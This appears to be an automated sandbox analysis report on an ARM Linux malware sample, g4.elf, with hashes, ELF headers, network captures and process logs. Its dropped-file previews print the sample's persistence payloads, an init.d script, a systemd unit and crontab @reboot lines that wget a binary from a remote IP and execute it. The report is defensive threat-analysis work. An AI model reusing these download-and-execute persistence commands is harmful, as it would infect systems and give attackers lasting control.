                            • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                            Go.exeGet hashmaliciousUnknownBrowse
                            • 1.1.1.1/
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSmsit.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.6.116
                            tesr.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.90.18
                            WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.134.197
                            msit.msiGet hashmaliciousLummaC StealerBrowse
                            • 172.67.134.197
                            Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            trow.exeGet hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5DkGet hashmaliciousUnknownBrowse
                            • 172.67.40.50
                            g3.elfGet hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            g5.elfGet hashmaliciousUnknownBrowse
                            • 1.1.1.1
                            ASGHOSTNETDEg3.elfGet hashmaliciousUnknownBrowse
                            • 77.90.22.16
                            g5.elfGet hashmaliciousUnknownBrowse
                            • 77.90.22.16
                            g4.elfGet hashmaliciousUnknownBrowse
                            • 77.90.22.16
                            g6.elfGet hashmaliciousUnknownBrowse
                            • 77.90.22.16
                            g3.elfGet hashmaliciousUnknownBrowse
                            • 77.90.22.16
                            ppc.elfGet hashmaliciousMiraiBrowse
                            • 5.175.194.122
                            x86.elfGet hashmaliciousMiraiBrowse
                            • 5.175.146.210
                            m1.elfGet hashmaliciousUnknownBrowse
                            • 77.90.22.16
                            m5.elfGet hashmaliciousUnknownBrowse
                            • 77.90.22.16
                            m2.elfGet hashmaliciousUnknownBrowse
                            • 77.90.22.16
                            No context
                            No context
                            Process:/tmp/g4.elf
                            File Type:Bourne-Again shell script, ASCII text executable
                            Category:dropped
                            Size (bytes):623
                            Entropy (8bit):4.741518354128752
                            Encrypted:false
                            SSDEEP:12:i5BpMp5kTMp5Gu+a6zEq26Y28Ly259srxylKNVUdURucTyl:ifpMr8MrPd6QqwLyAsrxy8bp4
                            MD5:C2038EA7FE2BBF5FB5083168ABA0286C
                            SHA1:1617AF2034E1FB9D81C18F1E0C1D6E3916E1B306
                            SHA-256:048C0096E4B0D64CFC4EC17A0490FB0BFE9E3A05FF51C235D432434696DFB42F
                            SHA-512:BA1AC31EAB058D950FE488671BDAE0E6782EEC71A767F71D62E01CA0EDB7148A3F47E9C095BDA9094338DC63629CD39C09FE8046A4F8BE00BD7BAF1B67555347
                            Malicious:true
                            Reputation:low
                            Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/g4; wget http://103.136.41.100/g4 -O /tmp/g4; chmod 777 /tmp/g4; /tmp/g4 >C 2 R -1157128192 A arm..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                            Process:/tmp/g4.elf
                            File Type:troff or preprocessor input, ASCII text
                            Category:dropped
                            Size (bytes):319
                            Entropy (8bit):5.267839685068323
                            Encrypted:false
                            SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOAtMFF5C26VGBg8s1IEkqTsCBLQmWA4Rv:zb9RZADJiIE+m4Eq26Y28L2FLHWrv
                            MD5:0492A1CECB5094FC26314EDD67D59AC6
                            SHA1:85B653524F223B396A11F61519A7358FBA6EBC00
                            SHA-256:BE37A496A475CF43174CF5DF7DAA5309EC26C05C4675FAF1308AD2F4D553E302
                            SHA-512:D64D2E53E73B84B0D52CC0A3A2D94E7C86CD3824FB83C537444A5CD9EACF0E82CFB9E8B731ED8BCB799DF0DEEC0DBE18D4DBADC21191EAF49AC38EF6CEB611F2
                            Malicious:false
                            Reputation:low
                            Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/g4; wget http://103.136.41.100/g4 -O /tmp/g4; chmod 777 /tmp/g4; /tmp/g4 >C 2 R -1157128192 A arm..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                            Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):76
                            Entropy (8bit):3.7627880354948586
                            Encrypted:false
                            SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                            MD5:D86A1F5765F37989EB0EC3837AD13ECC
                            SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                            SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                            SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                            Process:/tmp/g4.elf
                            File Type:troff or preprocessor input, ASCII text
                            Category:dropped
                            Size (bytes):140
                            Entropy (8bit):4.808493362967244
                            Encrypted:false
                            SSDEEP:3:SH3YFKKtoRFeMPHRC2I+KRIYoSGuVGBg2bEF1IUU0XzeVpFw2sePn:SH3otMFF5C26VGBg8s1IEkrw5Cn
                            MD5:681CF8AE791F70CA05173FBFF363FA93
                            SHA1:C27E22B3C3E848DA688269C6911B577F6568FE58
                            SHA-256:A76063652729293C03EF92B2485C861133914F831CADCE21DB14F6168AAEA488
                            SHA-512:42D4959240C268181C52F65284505FA56AE8705DD1F00428DD83A2977A1215E46A6EF443018CD59C3D6046868590E138606E96458CADF34A64FD19A4ADFE9DCF
                            Malicious:true
                            Reputation:low
                            Preview:@rebootrm -rf /tmp/g4; wget http://103.136.41.100/g4 -O /tmp/g4; chmod 777 /tmp/g4; /tmp/g4 >C 2 R -1157128192 A arm..p2 > /dev/null 2>&1;".
                            Process:/tmp/g4.elf
                            File Type:zlib compressed data
                            Category:dropped
                            Size (bytes):259
                            Entropy (8bit):3.482343383791146
                            Encrypted:false
                            SSDEEP:3:FV5IX9FQWUQfvxzVoHXSY/VUWV/FFFQWUQfvxm3/l/VVdf/FVLADsVHI1v/VVdft:OgcB7Y/VUS/FYc8/VjmsVot/VOArB/VF
                            MD5:A4081B8878882933359D0D776002F530
                            SHA1:DCF81EC7D8C3FEEE9E341BFD6E59DAAB398F450B
                            SHA-256:91E3CBA51E45CBDCFEA7B3C6E6C2EBD496135169123FA83512FC18086601C3BE
                            SHA-512:18C82C68DE2846DE158D1224E37C14104954B7327EDDEFAEC4395AE6D89A5ECC810D06186C078780F84288FDEC0D98E9EC20423AB630E60EA39922D25789084E
                            Malicious:false
                            Reputation:low
                            Preview:8000-1b000 r-xp 00000000 fd:00 531566 /tmp/g4.elf.23000-24000 rw-p 00013000 fd:00 531566 /tmp/g4.elf.24000-2a000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                            Process:/usr/bin/crontab
                            File Type:troff or preprocessor input, ASCII text
                            Category:dropped
                            Size (bytes):330
                            Entropy (8bit):5.242251002170307
                            Encrypted:false
                            SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ3j24iGMQ5UYLtCFt3HYotMFF5C26VGBg8s1Il:8Qj7QEuLut8fUeHLUHYAEq26Y28LP9
                            MD5:436833C49B79923C1EC211B7EFDECF4F
                            SHA1:9162D946E38262BA0C3DA163E1B419C15F9E5754
                            SHA-256:DF24BAECCA30AA40FC80EA0E55A9C236E00CC6ECFC6DC5E68AAA6C3098D5FA94
                            SHA-512:621669674C38BE994EC5841FE8911EB4DDD44A6F29E636EDD3386272428958EB4DEF6A79CD328AED0C58B7907565D2CF292D3A8F825FF062BF48458EB2959FF3
                            Malicious:true
                            Reputation:low
                            Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Mon Jan 13 01:53:07 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/g4; wget http://103.136.41.100/g4 -O /tmp/g4; chmod 777 /tmp/g4; /tmp/g4 >C 2 R -1157128192 A arm..p2 > /dev/null 2>&1;".
                            File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                            Entropy (8bit):6.103072157260984
                            TrID:
                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                            File name:g4.elf
                            File size:79'764 bytes
                            MD5:136fb2d91874d959cfd902863dbaaa5b
                            SHA1:e924e85331e5a9100fe2cc3ab7f3824e6f4defe2
                            SHA256:1ca51bb1da94ef8e16810e8b03f86694d3fba5cd46915cdba67f7ba82482234e
                            SHA512:32d364ded2025d4fcce3f8a136d8101bd4148d1b09bfeac2bb27ec662abe1113c3d76b8099f76751142c369d2074af040b5aaaff276b4a2ac048bf48b4a62c96
                            SSDEEP:1536:PbSna0PAeU9itJB+Zn5+C63+sMPiT7NNzYdnkgIZgTeg:T9in4o7NNzYdzJT
                            TLSH:0C730956F9815B42C5D402BB7A1E569E33076BA8E3DE3313DD241B24778B62F0F27906
                            File Content Preview:.ELF..............(.....T...4....5......4. ...(......................-...-...............0...0...0..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..5.......0....-.@0....S

                            ELF header

                            Class:ELF32
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:ARM
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - System V
                            ABI Version:0
                            Entry Point Address:0x8154
                            Flags:0x4000002
                            ELF Header Size:52
                            Program Header Offset:52
                            Program Header Size:32
                            Number of Program Headers:3
                            Section Header Offset:79244
                            Section Header Size:40
                            Number of Section Headers:13
                            Header String Table Index:12
                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                            NULL0x00x00x00x00x0000
                            .initPROGBITS0x80940x940x100x00x6AX004
                            .textPROGBITS0x80b00xb00x113800x00x6AX0016
                            .finiPROGBITS0x194300x114300x100x00x6AX004
                            .rodataPROGBITS0x194400x114400x19440x00x2A004
                            .eh_framePROGBITS0x230000x130000x40x00x3WA004
                            .init_arrayINIT_ARRAY0x230040x130040x40x00x3WA004
                            .fini_arrayFINI_ARRAY0x230080x130080x40x00x3WA004
                            .gotPROGBITS0x230100x130100x740x40x3WA004
                            .dataPROGBITS0x230840x130840x4900x00x3WA004
                            .bssNOBITS0x235140x135140x29980x00x3WA004
                            .ARM.attributesARM_ATTRIBUTES0x00x135140x100x00x0001
                            .shstrtabSTRTAB0x00x135240x670x00x0001
                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            LOAD0x00x80000x80000x12d840x12d846.12560x5R E0x8000.init .text .fini .rodata
                            LOAD0x130000x230000x230000x5140x2eac6.01510x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 13, 2025 08:53:07.658371925 CET4865553192.168.2.131.1.1.1
                            Jan 13, 2025 08:53:07.663220882 CET53486551.1.1.1192.168.2.13
                            Jan 13, 2025 08:53:07.663331985 CET4865553192.168.2.131.1.1.1
                            Jan 13, 2025 08:53:07.663398981 CET4865553192.168.2.131.1.1.1
                            Jan 13, 2025 08:53:07.668312073 CET53486551.1.1.1192.168.2.13
                            Jan 13, 2025 08:53:07.668371916 CET4865553192.168.2.131.1.1.1
                            Jan 13, 2025 08:53:08.871448040 CET521005625192.168.2.1377.90.22.16
                            Jan 13, 2025 08:53:08.876374960 CET56255210077.90.22.16192.168.2.13
                            Jan 13, 2025 08:53:08.876472950 CET521005625192.168.2.1377.90.22.16
                            Jan 13, 2025 08:53:08.906405926 CET521005625192.168.2.1377.90.22.16
                            Jan 13, 2025 08:53:08.911233902 CET56255210077.90.22.16192.168.2.13
                            Jan 13, 2025 08:53:39.640755892 CET521005625192.168.2.1377.90.22.16
                            Jan 13, 2025 08:53:39.645591974 CET56255210077.90.22.16192.168.2.13
                            Jan 13, 2025 08:54:10.360850096 CET521005625192.168.2.1377.90.22.16
                            Jan 13, 2025 08:54:10.365649939 CET56255210077.90.22.16192.168.2.13
                            Jan 13, 2025 08:54:20.001257896 CET521005625192.168.2.1377.90.22.16
                            Jan 13, 2025 08:54:20.007911921 CET56255210077.90.22.16192.168.2.13
                            Jan 13, 2025 08:54:20.188443899 CET56255210077.90.22.16192.168.2.13
                            Jan 13, 2025 08:54:20.188534975 CET521005625192.168.2.1377.90.22.16
                            Jan 13, 2025 08:54:51.321180105 CET521005625192.168.2.1377.90.22.16
                            Jan 13, 2025 08:54:51.326066971 CET56255210077.90.22.16192.168.2.13

                            System Behavior

                            Start time (UTC):07:52:49
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:52:49
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/rm
                            Arguments:rm -f /tmp/tmp.uBHxhDQd7Y /tmp/tmp.K3ToqUjpQk /tmp/tmp.A4ESWgLvug
                            File size:72056 bytes
                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                            Start time (UTC):07:52:49
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:52:49
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/rm
                            Arguments:rm -f /tmp/tmp.uBHxhDQd7Y /tmp/tmp.K3ToqUjpQk /tmp/tmp.A4ESWgLvug
                            File size:72056 bytes
                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                            Start time (UTC):07:52:59
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:/tmp/g4.elf
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:06
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:06
                            Start date (UTC):13/01/2025
                            Path:/bin/sh
                            Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:53:06
                            Start date (UTC):13/01/2025
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:53:06
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/systemctl
                            Arguments:systemctl daemon-reload
                            File size:996584 bytes
                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/bin/sh
                            Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/systemctl
                            Arguments:systemctl start hello.service
                            File size:996584 bytes
                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/bin/sh
                            Arguments:sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/crontab
                            Arguments:crontab /tmp/crontab.tmp
                            File size:43720 bytes
                            MD5 hash:66e521d421ac9b407699061bf21806f5

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/bin/sh
                            Arguments:sh -c "/etc/init.d/hello > /dev/null 2>&1"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:07
                            Start date (UTC):13/01/2025
                            Path:/tmp/g4.elf
                            Arguments:-
                            File size:4956856 bytes
                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                            Start time (UTC):07:53:02
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):07:53:02
                            Start date (UTC):13/01/2025
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):07:53:02
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):07:53:02
                            Start date (UTC):13/01/2025
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):07:53:02
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):07:53:02
                            Start date (UTC):13/01/2025
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):07:53:02
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):07:53:02
                            Start date (UTC):13/01/2025
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):07:53:03
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):07:53:03
                            Start date (UTC):13/01/2025
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):07:53:03
                            Start date (UTC):13/01/2025
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):07:53:03
                            Start date (UTC):13/01/2025
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):07:53:06
                            Start date (UTC):13/01/2025
                            Path:/usr/lib/systemd/systemd
                            Arguments:-
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Start time (UTC):07:53:06
                            Start date (UTC):13/01/2025
                            Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                            Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                            File size:22760 bytes
                            MD5 hash:3633b075f40283ec938a2a6a89671b0e